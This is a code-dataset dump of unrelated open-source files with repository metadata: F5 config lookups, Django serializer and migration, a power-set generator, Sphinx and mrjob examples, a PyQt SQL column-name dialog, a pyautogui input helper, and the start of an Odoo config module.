return self.__LtmConfigV11.LtmPoolSet
@property
def MemberSet(self):
return self.__LtmConfigV11.MemberSet
@property
def MonitorSet(self):
return self.__LtmConfigV11.MonitorSet
@property
def GtmSetV11(self):
return self.__GtmConfigV11.GtmSet
@property
def GtmServerSetV11(self):
return self.__GtmConfigV11.GtmServerSet
@property
def GtmPoolSetV11(self):
return self.__GtmConfigV11.GtmPoolSet
@property
def GtmSetV10(self):
return self.__GtmConfigV10.GtmSet
@property
def GtmServerSetV10(self):
return self.__GtmConfigV10.GtmServerSet
@property
def GtmPoolSetV10(self):
return self.__GtmConfigV10.GtmPoolSet
def GetWideIpToGtmPoolV11(self, WideIp):
return self.__SearchWideIpToGtmPoolV11(WideIp)
def GetWideIpToServerListV11(self, WideIp):
return self.__SearchWideipToSeverListV11(WideIp)
def GetIpToVsListV11(self, AIp):
return self.__SearchIpToVsV11(AIp)
def GetVsToHttpClassV11(self, Vs):
return self.__SearchVsToHttpClassV11(Vs)
def GetVsToProfilesV11(self, Vs):
return self.__SearchVsToProfilesV11(Vs)
def GetVsToPoolName(self, Vs):
return self.__SearchVsToPoolName(Vs)
def GetLtmPoolNameToPoolMembersList(self, LtmPoolName):
return self.__SearchLtmPoolNameToPoolMembersList(LtmPoolName)
def GetVsIpList(self):
return self.__SearchVsIpListV11()
def GetIpToGtmServer(self, AIp):
return self.__SearchIpToGtmServer(AIp)
def GetGtmServerNameToGtmPoolList(self, ServerName):
return self.__SearchGtmServerNameToGtmPoolList(ServerName)
def GetGtmPoolListToGtmWideipList(self, GtmPoolNameList):
return self.__SearchGtmPoolListToGtmWideipList(GtmPoolNameList)
def GetIpToVsZero(self, Ip):
return self.__SearchIpToVsZero(Ip)
@property
def GetMonitorList(self):
for key,value in self.__LtmConfigV11.MonitorSet.items():
if key.find('-name') == -1:
continue
else:
self.__LtmMonitorList.append(value)
continue
return self.__LtmMonitorList
@property
def GetPoolList(self):
for key,value in self.__LtmConfigV11.LtmPoolSet.items():
if key.find('-name') == -1:
continue
else:
self.__LtmPoolList.append(value)
continue
return set(self.__LtmPoolList)
@property
def GetVsList(self):
for key,value in self.__LtmConfigV11.VsSet.items():
if key.find('-name') == -1:
continue
else:
self.__LtmVsList.append(value)
continue
return set(self.__LtmVsList)
    ####input a WideIp, find out its GTM pool
def __SearchWideIpToGtmPoolV11(self, WideIp):
WideIpPool = WideIp + '-wideippool'
return self.__GtmConfigV11.GtmSet.get(WideIpPool, None)
    ####input a WideIp, find out its GTM servers
def __SearchWideipToSeverListV11(self, WideIp):
GtmPoolName = self.__SearchWideIpToGtmPoolV11(WideIp)
return self.__GtmConfigV11.GtmPoolSet.get(GtmPoolName, None)
    ####input an IP or A record, find out the VSs
def __SearchIpToVsV11(self, AIp):
VsList = []
VsSet = self.__LtmConfigV11.VsSet
VsSetList = self.__LtmConfigV11.VsSet.items()
for (keys, value) in VsSetList:
if keys.find('-ip') == -1:
continue
else:
if value == AIp:
str = keys.split('-ip')[0] + '-port'
VsList.append(keys.split('-ip')[0] + ':' + VsSet.get(str, None))
return VsList
    ####input a VS name, output this VS's http-class
def __SearchVsToHttpClassV11(self, Vs):
GetVsHttpClassStr = Vs + '-http-class'
return self.__LtmConfigV11.VsSet.get(GetVsHttpClassStr, None)
    ####input a VS name, output this VS's profiles
def __SearchVsToProfilesV11(self, Vs):
GetVsProfilesStr = Vs + '-profile'
return self.__LtmConfigV11.VsSet.get(GetVsProfilesStr, None)
    ####input a VS name, output this VS's pool
def __SearchVsToPoolName(self, Vs):
GetVsPoolStr = Vs + '-pool'
return self.__LtmConfigV11.VsSet.get(GetVsPoolStr, None)
####input an pool name, output this pool members list
def __SearchLtmPoolNameToPoolMembersList(self, LtmPoolName):
return self.__LtmConfigV11.LtmPoolSet.get(LtmPoolName, None)
####get all vs ip from bigip.conf
def __SearchVsIpListV11(self):
VsIpList = []
VsSet = self.__LtmConfigV11.VsSet
VsSetList = VsSet.items()
for (keys, value) in VsSetList:
if keys.find('-ip') == -1:
continue
else:
#print F5ToolPackage.GetF5V11LtmConfig(LtmConfigFileNameV11).VsSet.get(keys, None)
VsIpList.append(VsSet.get(keys, None))
return list(set(VsIpList))
####input an IP, find out gtm server name
def __SearchIpToGtmServer(self, AIp):
GtmServerName = ''
GtmServerSetV11List = self.__GtmConfigV11.GtmServerSet.items()
GtmServerSetV10List = self.__GtmConfigV10.GtmServerSet.items()
for (keys, value) in GtmServerSetV10List:
if keys.find('-ip') == -1:
continue
else:
if value == AIp:
GtmServerName = AIp
for (keys, value) in GtmServerSetV11List:
if keys.find('-ip') == -1:
continue
else:
if value == AIp:
GtmServerName = keys.split('-ip')[0]
return GtmServerName
####search servername to gtm pool, using gtmpool as [], because a gtm server can be attached to multiply gtm pool
def __SearchGtmServerNameToGtmPoolList(self, ServerName):
WideIpPoolNanme = []
GtmPoolSetV10List = self.__GtmConfigV10.GtmPoolSet.items()
GtmPoolSetV11List = self.__GtmConfigV11.GtmPoolSet.items()
if re.match(r"^\d+\.\d+\.\d+\.\d+$", ServerName):
for (keys, value) in GtmPoolSetV10List:
for PoolIP in value:
if PoolIP == ServerName:
WideIpPoolNanme.append(keys)
else:
for (keys, value) in GtmPoolSetV11List:
for MemberName in value:
if MemberName == ServerName:
WideIpPoolNanme.append(keys)
WideIpPoolNanme = list(set(WideIpPoolNanme))
return WideIpPoolNanme
def __SearchGtmPoolListToGtmWideipList(self, GtmPoolNameList):
WideipName = []
GtmWideipSetV10List = self.__GtmConfigV10.GtmSet.items()
GtmWideipSetV11List = self.__GtmConfigV11.GtmSet.items()
for (keys, value) in GtmWideipSetV10List:
if keys.find('-wideippool') == -1:
continue
else:
for GtmPoolName in GtmPoolNameList:
if value == GtmPoolName:
WideipName.append(keys.split('-wideippool')[0])
for (keys, value) in GtmWideipSetV11List:
if keys.find('-wideippool') == -1:
continue
else:
for GtmPoolName in GtmPoolNameList:
if value == GtmPoolName:
WideipName.append(keys.split('-wideippool')[0])
WideipName = list(set(WideipName))
return WideipName
    ####input an IP, return the name of its VS on port 0
    def __SearchIpToVsZero(self, Ip):
        for value in self.__SearchIpToVsV11(Ip):
            if value.split(':')[1] == '0':
                return value.split(':')[0]
        # original returned the last examined VS (or raised NameError on an
        # empty list) when no port-0 match existed
        return None
####get ltm monitor list
####def __Get
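#### Minimal usage sketch (config file names are placeholders):
# searcher = ConfigSearchFunctions()
# searcher.SetLtmConfigV11('bigip.conf')         # parse the LTM config
# searcher.SetGtmConfigV11('bigip_gtm.conf')     # parse the v11 GTM config
# print(searcher.GetIpToVsListV11('10.0.0.1'))   # 'vsname:port' entries on this IP
# print(searcher.GetVsToPoolName('vs_example'))  # pool attached to a VS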
| [
"[email protected]"
] | |
b9aa5d8831498274255a63071c2658ecd43f0335 | aae994a76b683db92ba6a09c3ff8c0922c981ca3 | /channels-example/notifier/serializers.py | df05982681097c0c217c5276a239ad9129c86bb7 | [] | no_license | MerinRose123/python_django_notification | 8b84e2412c640d2d9703afd7b47cca13413d0c70 | 3a1082ac336c6e5b5c3ae0ae1efe8db4aa3c67e8 | refs/heads/master | 2022-11-06T14:56:32.308138 | 2020-12-29T06:23:35 | 2020-12-29T06:23:35 | 204,337,137 | 0 | 0 | null | 2022-11-04T19:36:59 | 2019-08-25T18:57:42 | JavaScript | UTF-8 | Python | false | false | 812 | py | from rest_framework import serializers
from rest_framework.validators import UniqueValidator
from django.contrib.auth.models import User
class UserSerializer(serializers.ModelSerializer):
email = serializers.EmailField(
required=True,
validators=[UniqueValidator(queryset=User.objects.all())]
)
username = serializers.CharField(
max_length=32,
validators=[UniqueValidator(queryset=User.objects.all())]
)
password = serializers.CharField(min_length=8, write_only=True)
def create(self, validated_data):
user = User.objects.create_user(validated_data['username'], validated_data['email'], validated_data['password'])
return user
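    # Usage sketch (payload values are illustrative): DRF invokes create()
    # through serializer.save() once is_valid() has passed:
    #   s = UserSerializer(data={'username': 'panda',
    #                            'email': '[email protected]',
    #                            'password': 'hunter2pass'})
    #   if s.is_valid():
    #       user = s.save()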
class Meta:
model = User
fields = ('id', 'username', 'email', 'password') | [
"[email protected]"
] | |
180d5f73e5579b1c35d5fbc01c5cf62c994d3f21 | 6df4bdb2ab23ea3281defb804924574c2e0b51b9 | /pycharm/Project1/power_set.py | 5ece86f0dcddc5a1548d2291655c123b0963c0cf | [] | no_license | AndroZa0812/python_ml_notebook | e3d876fcbb09fc0a2db09bb0679989112441bcfa | 1224049f5c62da6915769dd8fec8eab73de45d96 | refs/heads/master | 2020-06-11T10:03:14.381852 | 2019-06-27T13:59:47 | 2019-06-27T13:59:47 | 193,925,025 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 348 | py | def power_set(s):
    if len(s) == 0:
        yield set()  # the empty set is the only subset of an empty set
        return
    s = set(s)  # copy so the caller's set is not mutated by pop()
    item = s.pop()
subsets_without_item = power_set(s)
for subset in subsets_without_item:
yield subset
new_subset = set(subset)
new_subset.add(item)
yield new_subset
my_set = {1, 3, 6}
for s in power_set(my_set):
print(s)
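# Cross-check against a non-mutating standard-library version built on
# itertools.combinations (it yields tuples rather than sets):
from itertools import chain, combinations

def power_set_iter(iterable):
    items = list(iterable)
    return chain.from_iterable(
        combinations(items, r) for r in range(len(items) + 1))

print(list(power_set_iter(my_set)))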
| [
"[email protected]"
] | |
33b29ac765433248dcb4c90c89b722b5ee8df584 | 03ac4592dd2a54c792273afdd5c9a8f547e40565 | /ordwebapp/tarjetas/migrations/0003_auto_20200522_2107.py | e9ca5434530a4f497084d795fbbb859d4e370151 | [] | no_license | Roninjc/norskord | d49dd3f1ab28731a72b88b89c94c36473a0ff1cd | 997e182b837d6ac85c3d0f6b887eea8d31aa55d5 | refs/heads/master | 2023-08-01T03:25:16.441602 | 2021-09-19T21:52:01 | 2021-09-19T21:52:01 | 408,240,935 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 592 | py | # Generated by Django 3.0.4 on 2020-05-22 19:07
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('tarjetas', '0002_auto_20200522_2100'),
]
operations = [
migrations.RemoveField(
model_name='verbsfeatures',
name='norwegian',
),
migrations.DeleteModel(
name='NounsFeatures',
),
migrations.DeleteModel(
name='Ordforrad',
),
migrations.DeleteModel(
name='VerbsFeatures',
),
]
| [
"[email protected]"
] | |
9c9f4d8294f3d0a807f98c70ff94b6f63a87f38a | 2b15539963c5111bff1842cd73880a7ba30d3591 | /RasterPixelCountStat/help/source/conf.py | 4e5c09351f9b0db4f3109affa2cda745c96c801e | [] | no_license | mangowoong/qgis_rasterpixelcountstat_plugin | 44c18aa46ef40d7f629407702b912560f174f6e3 | 7cc4e4d89ed6aaabd799e806402a32503adc2447 | refs/heads/master | 2021-01-23T22:06:17.543565 | 2014-03-25T12:12:08 | 2014-03-25T12:32:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,152 | py | # -*- coding: utf-8 -*-
#
# rasterpixelcountstat documentation build configuration file, created by
# sphinx-quickstart on Sun Feb 12 17:11:03 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.todo', 'sphinx.ext.pngmath', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'rasterpixelcountstat'
copyright = u'2013, Kiwoong Kim/MangoSystem Inc.'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'rasterpixelcountstatdoc'  # was left at the sphinx-quickstart template default
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'rasterpixelcountstat.tex', u'rasterpixelcountstat Documentation',
u'Kiwoong Kim/MangoSystem Inc.', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
    ('index', 'rasterpixelcountstat', u'rasterpixelcountstat Documentation',
     [u'Kiwoong Kim/MangoSystem Inc.'], 1)
]
| [
"[email protected]"
] | |
e0f11bd247a9501b84bd35851b67e487cb716a26 | 81407be1385564308db7193634a2bb050b4f822e | /the-python-standard-library-by-example/gettext/gettext_app_builtin.py | 4c83ee623903f1b380c489b3d6896e7f8c8b49f8 | [
"MIT"
] | permissive | gottaegbert/penter | 6db4f7d82c143af1209b4259ba32145aba7d6bd3 | 8cbb6be3c4bf67c7c69fa70e597bfbc3be4f0a2d | refs/heads/master | 2022-12-30T14:51:45.132819 | 2020-10-09T05:33:23 | 2020-10-09T05:33:23 | 305,266,398 | 0 | 0 | MIT | 2020-10-19T04:56:02 | 2020-10-19T04:53:05 | null | UTF-8 | Python | false | false | 281 | py | #!/usr/bin/env python
# encoding: utf-8
#
# Copyright (c) 2009 Doug Hellmann All rights reserved.
#
"""
"""
#end_pymotw_header
import gettext
gettext.install('gettext_example', 'locale',
unicode=True, names=['ngettext'])
print _('This message is in the script.')
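# Because names=['ngettext'] was passed to install(), ngettext() is also a
# builtin here; a plural-aware message would look like (sketch, n assumed
# to hold a count):
#   print ngettext('%(num)d file', '%(num)d files', n) % {'num': n}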
| [
"[email protected]"
] | |
2f9e06b5629f852ff6e4d8b648aa296bb00bc310 | 2a4e7362819b725cb905c171f0bd69e922f2f71a | /python-venv/lib/python2.7/site-packages/mrjob/examples/mr_jar_step_example.py | 36dc1af41369ece780f8600bb04ec320ae2bf0cf | [] | no_license | adityagc/CS-109-Data-science | e1aac95c5216d28fce42ca35efa4c115c5bf56b6 | 359e200f6ef3d5232608306c4b30841727514a00 | refs/heads/master | 2022-11-15T20:57:51.662164 | 2018-07-15T15:52:50 | 2018-07-15T15:52:50 | 135,188,380 | 0 | 2 | null | 2022-11-03T16:22:52 | 2018-05-28T17:04:33 | Python | UTF-8 | Python | false | false | 2,974 | py | # Copyright 2013 David Marin
# Copyright 2016 Yelp
# Copyright 2018 Yelp and Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A simple example of linking a hadoop jar with a Python step. This
calculates the frequency of various word frequencies in a text file.
This example works out-of-the box on EMR and Google Cloud Dataproc.
This also only works on a single input path/directory, due to limitations
of the example jar.
"""
from mrjob.job import MRJob
from mrjob.protocol import RawProtocol
from mrjob.step import INPUT
from mrjob.step import JarStep
from mrjob.step import MRStep
from mrjob.step import OUTPUT
# use the file:// trick to access a jar hosted on the cloud
_RUNNER_TO_EXAMPLES_JAR = dict(
dataproc='file:///usr/lib/hadoop-mapreduce/hadoop-mapreduce-examples.jar',
emr='file:///home/hadoop/hadoop-examples.jar',
)
_WORDCOUNT_MAIN_CLASS = 'org.apache.hadoop.examples.WordCount'
class MRJarStepExample(MRJob):
"""A contrived example that runs wordcount from the hadoop example
jar, and then does a frequency count of the frequencies."""
def configure_args(self):
super(MRJarStepExample, self).configure_args()
self.add_passthru_arg(
'--use-main-class', dest='use_main_class',
default=False, action='store_true')
self.pass_arg_through('--runner')
def steps(self):
jar = _RUNNER_TO_EXAMPLES_JAR[self.options.runner]
if self.options.use_main_class:
jar_step = JarStep(
jar=jar,
args=[INPUT, OUTPUT],
main_class=_WORDCOUNT_MAIN_CLASS,
)
else:
jar_step = JarStep(
jar=jar,
args=['wordcount', INPUT, OUTPUT],
)
return [
jar_step,
MRStep(
mapper=self.mapper,
combiner=self.reducer,
reducer=self.reducer,
)
]
def mapper(self, key, freq):
yield int(freq), 1
def reducer(self, freq, counts):
yield freq, sum(counts)
def pick_protocols(self, step_num, step_type):
"""Use RawProtocol to read output from the jar."""
read, write = super(MRJarStepExample, self).pick_protocols(
step_num, step_type)
if (step_num, step_type) == (1, 'mapper'):
read = RawProtocol().read
return read, write
if __name__ == '__main__':
MRJarStepExample.run()
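# Example invocation (bucket names/paths are illustrative):
#
#   python mr_jar_step_example.py -r emr s3://my-bucket/input/ \
#       --output-dir s3://my-bucket/word-freq-out/
#
# The jar's wordcount runs first; the MRStep then tallies how many words
# share each frequency.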
| [
"[email protected]"
] | |
dc01cdd99c347bd0942b58121f69fb3ab51dc1b4 | b25d9132796d4e5996cac6305a7fba748ba2608f | /src/cab_service/urls.py | 9ba0f8a93aacedeaec2f9348f29d8cfd3013d0a3 | [] | no_license | gouravtulsani/Cabapp_backend | 8228053178dd572ac817cadb823ffd06be64f77e | e8a4a498e36e3101738cb866f5bc624291dc4f03 | refs/heads/master | 2020-06-03T14:03:27.397192 | 2018-11-13T14:51:09 | 2019-01-23T09:58:20 | 191,596,725 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 805 | py | """cab_service URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import include, path
urlpatterns = [
path('api/', include('cab_app.urls')),
path('admin/', admin.site.urls),
]
| [
"[email protected]"
] | |
d7b05238b67662fd441e4df6933439ac26248aff | 13c3028d52bdb7a647921b52367a9c804e07cc25 | /epyseg/ta/database/sql_column_name_dialog.py | c8a790bf9dc3c7b94ff5323f44fe120a199f2d07 | [
"Apache-2.0",
"MPL-2.0",
"HPND",
"BSD-3-Clause",
"GPL-3.0-only"
] | permissive | baigouy/EPySeg | 8b1a062f5e88405ca07bd33c6427686182bdae9d | 5ce46ce981c7607c74d9a8f82ef942b207bdb210 | refs/heads/master | 2022-07-26T10:30:41.056239 | 2022-05-24T13:03:50 | 2022-05-24T13:03:50 | 272,421,806 | 19 | 5 | BSD-3-Clause | 2022-05-23T08:27:41 | 2020-06-15T11:34:48 | Python | UTF-8 | Python | false | false | 4,736 | py | # enter a SQL col name --> if name is not valid then forget about it...
# maybe also need enter the type of the new column --> ????
import sys
from PyQt5 import QtCore
from PyQt5.QtWidgets import QDialog, QPlainTextEdit, QVBoxLayout, QApplication, QDialogButtonBox, QSpinBox, QLabel, \
QLineEdit, QComboBox
import re
# NULL. The value is a NULL value.
# INTEGER. The value is a signed integer, stored in 1, 2, 3, 4, 6, or 8 bytes depending on the magnitude of the value.
# REAL. The value is a floating point value, stored as an 8-byte IEEE floating point number.
# TEXT. The value is a text string, stored using the database encoding (UTF-8, UTF-16BE or UTF-16LE).
# BLOB
class SQL_column_name_and_type(QDialog):
def __init__(self, parent=None, title=None, existing_column_name=None):
super(SQL_column_name_and_type, self).__init__(parent)
if title is not None:
self.setWindowTitle(title)
self.existing_column_name = existing_column_name
if isinstance(self.existing_column_name, list):
self.existing_column_name = [name.lower() for name in self.existing_column_name]
layout = QVBoxLayout()
label = QLabel('Please enter a column name that is not in the table.\nThe name should contain no space')
layout.addWidget(label)
self.column_name = QLineEdit()
self.column_name.textChanged.connect(self.column_name_changed)
layout.addWidget(self.column_name)
self.type = QComboBox()
self.type.addItem('REAL')
self.type.addItem('INTEGER')
self.type.addItem('TEXT')
self.type.addItem('BLOB')
layout.addWidget(self.type)
# OK and Cancel buttons
self.buttons = QDialogButtonBox(
QDialogButtonBox.Ok | QDialogButtonBox.Cancel,
QtCore.Qt.Horizontal, self)
self.buttons.accepted.connect(self.accept)
self.buttons.rejected.connect(self.reject)
self.buttons.button( QDialogButtonBox.Ok).setEnabled(False)
layout.addWidget(self.buttons)
self.setLayout(layout)
def column_name_changed(self):
if self.is_text_valid():
self.buttons.button(QDialogButtonBox.Ok).setEnabled(True)
else:
self.buttons.button(QDialogButtonBox.Ok).setEnabled(False)
    # NOTE: column existence is already checked in is_text_valid() via existing_column_name
def is_text_valid(self):
# print(self.column_name.text().isalnum()) # not good because excludes _
# print(self.column_name.text().lower(), self.existing_column_name, self.column_name.text().lower() in self.existing_column_name)
if self.existing_column_name is not None:
if self.column_name.text().lower() in self.existing_column_name:
return False
# this is a regex to check whether the column name is ok
if re.findall(r'^[a-zA-Z_][a-zA-Z0-9_]*$', self.column_name.text()):
return True
return False
@staticmethod
def get_value(parent=None, title=None, existing_column_name=None):
dialog = SQL_column_name_and_type(parent=parent, title=title, existing_column_name=existing_column_name)
result = dialog.exec_()
values = [dialog.column_name.text(), dialog.type.currentText()]
return (values, result == QDialog.Accepted)
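# Downstream usage sketch (table name 'my_table' is a placeholder): because
# the name is regex-validated above, it can be spliced into DDL, where bound
# parameters cannot be used for identifiers:
#   (name, col_type), ok = SQL_column_name_and_type.get_value(
#       title="New Column Name", existing_column_name=['time'])
#   if ok:
#       cursor.execute('ALTER TABLE my_table ADD COLUMN %s %s' % (name, col_type))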
if __name__ == '__main__':
if False:
import sys
# txt = 'thuis is a test'
txt = 'thuis_is_a_test'
# txt = 'thuis_is.a_test'
# txt = 'thuis_is a_test'
# txt = 'thuis_is99a_test'
# txt = ' '
# txt = ''
# if ''.join(e for e in string if e.isalnum())
# if txt.isalnum():
# print(True)
# else:
# print(False)
# r1 = re.findall(r'[^\s]+',txt)
# regex for valid sql column name
r1 = re.findall(r'^[a-zA-Z_][a-zA-Z0-9_]*$',txt)
if r1:
print(True)
else:
print(False)
print(r1)
# p = re.compile(r'[^\s]+')
# p = re.compile('\S+')
# p = re.compile(r'[A-Za-z0-9 _.,!"/$]*')
# print(p.match('thuis is a test'))
# if p.match('thuis is a test'):
# print(True)
# else:
# print(False)
sys.exit(0)
app = QApplication(sys.argv)
    colname_and_type, ok = SQL_column_name_and_type.get_value(title="New Column Name", existing_column_name=['time'])
# form.show()
# text, ok = app.exec_()
# print(form.get_value())
# text, ok = QInputDialog.getText(self, 'Text Input Dialog', 'Enter your SQl command:')
if ok:
# self.le1.setText(str(text))
        print(colname_and_type)
else:
pass
sys.exit(0) | [
"[email protected]"
] | |
46c4b57372975788f41b6a1641a58fa31c914e8a | 6e3f02ce12ec2e209aa524e4e8f4eabddbc27e11 | /interaction.py | 1b7aa3715607c90574f8ac3e00e786a2a71103d8 | [] | no_license | irmalien/Face-tracking-mouse-movement | 5494f56ee7cbf2530e0186b13edcdb3c72dedd65 | 48031b82d8006a646b5c8af2e28b1549cacc6671 | refs/heads/master | 2022-04-07T15:44:17.233882 | 2020-03-11T19:37:52 | 2020-03-11T19:37:52 | 220,056,413 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,475 | py | import pyautogui
class Interaction:
def __init__(self,
output_screen,
keypress_precision=8):
self.keypress_precision = keypress_precision
self.output_screen_width = output_screen['w']
self.output_screen_height = output_screen['h']
def move_keyboard(self, x, y):
width = self.output_screen_width
height = self.output_screen_height
number_of_keypress = self.keypress_precision
        # re-centre so (0, 0) is the middle of the screen; the sign of x/y
        # then selects the arrow-key direction below
        x = x - (width / 2)
y = y - (height / 2)
area_x = 'left' if x < 0 else 'right'
area_y = 'up' if y < 0 else 'down'
if area_x == 'left':
steps_x = self.__map(x, -(width / 2), 0, number_of_keypress, 0)
else:
steps_x = self.__map(x, 0, width / 2, 0, number_of_keypress)
steps_x = int(round(steps_x))
for times in range(steps_x):
pyautogui.press(area_x)
if area_y == 'up':
steps_y = self.__map(y, -(height / 2), 0, number_of_keypress, 0)
else:
steps_y = self.__map(y, 0, height / 2, 0, number_of_keypress)
steps_y = int(round(steps_y * 2))
for times in range(steps_y):
pyautogui.press(area_y)
def move_mouse(self, x, y):
pyautogui.moveTo(x, y)
def __map(self, value, start1, stop1, start2, stop2):
newValue = ((value - start1) / (stop1 - start1)) * \
(stop2 - start2) + start2
return newValue
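# Usage sketch (screen size and coordinates are illustrative; these calls
# really move the host's pointer via pyautogui):
#   ui = Interaction({'w': 1920, 'h': 1080}, keypress_precision=8)
#   ui.move_mouse(960, 540)        # jump to the screen centre
#   ui.move_keyboard(1920, 1080)   # bottom-right corner -> maximum arrow presses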
| [
"[email protected]"
] | |
0e04438260526e443c3d7066c4278865b861da3c | 1b19103c7781c31b4042e5404eea46fa90014a70 | /cenit_city_context_api_1_0_0/models/config.py | 33c8075afb540d3e7d9582d3424653c5b110bdd7 | [] | no_license | andhit-r/odoo-integrations | c209797d57320f9e49271967297d3a199bc82ff5 | dee7edc4e9cdcc92e2a8a3e9c34fac94921d32c0 | refs/heads/8.0 | 2021-01-12T05:52:26.101701 | 2016-12-22T03:06:52 | 2016-12-22T03:06:52 | 77,223,257 | 0 | 1 | null | 2016-12-23T12:11:08 | 2016-12-23T12:11:08 | null | UTF-8 | Python | false | false | 3,600 | py | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010, 2014 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import logging
from openerp import models, fields
_logger = logging.getLogger(__name__)
COLLECTION_NAME = "city_context_api_1_0_0"
COLLECTION_VERSION = "0.1"
COLLECTION_PARAMS = {
    # NOTE: the generated template left this mapping empty; 'api_key' is a
    # placeholder inferred from the 'API Key' field below and must match the
